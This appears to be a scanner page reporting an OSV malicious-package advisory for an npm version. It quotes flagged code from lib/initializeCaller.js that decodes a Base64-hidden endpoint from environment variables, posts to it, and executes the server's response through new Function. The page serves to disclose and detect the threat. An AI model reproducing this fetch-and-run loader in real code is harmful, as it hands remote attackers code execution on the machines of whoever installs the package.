OSV Malicious Advisory
scanned 6m ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10518 confirms this npm version as malicious.
Advisory
MAL-2026-10518
Source
OpenSSF Malicious Packages via OSV
Decision reason
One or more suspicious static signals were detected.
References
Decision evidence
public snapshotBehavioral surface
ChildProcessEnvironmentVarsEvalNetwork
HighEntropyStringsUrlStrings
Source & flagged code
4 flagged · loading sourcelib/initializeCaller.jsView file
28.then(response => {
L29: const executor = new Function("require", response.data);
L30: executor(require);
High
13const apiEndpoint = atob(process.env.DEV_API_KEY);
L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY);
L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE);
...
L22:
L23: await axios.post(
L24: apiEndpoint,
...
L28: .then(response => {
L29: const executor = new Function("require", response.data);
L30: executor(require);
High
Same File Env Network Execution
A single source file combines environment access, network access, and code or shell execution; review context before blocking.
lib/initializeCaller.jsView on unpkg · L132L3: const axios = require("axios");
L4: const process = {
...
L12: (async function initializeCaller(..._args) {
L13: const apiEndpoint = atob(process.env.DEV_API_KEY);
L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY);
...
L22:
L23: await axios.post(
L24: apiEndpoint,
...
L28: .then(response => {
L29: const executor = new Function("require", response.data);
L30: executor(require);
High
Base64 Obscured Url
Source decodes a Base64-obscured HTTP endpoint at runtime.
lib/initializeCaller.jsView on unpkg · L2docs/transports.mdView file
550patternName = generic_password
severity = medium
line = 550
matchedText = password...rd',
Medium
Findings
4 High3 Medium3 Low
HighChild Process
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighBase64 Obscured Urllib/initializeCaller.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings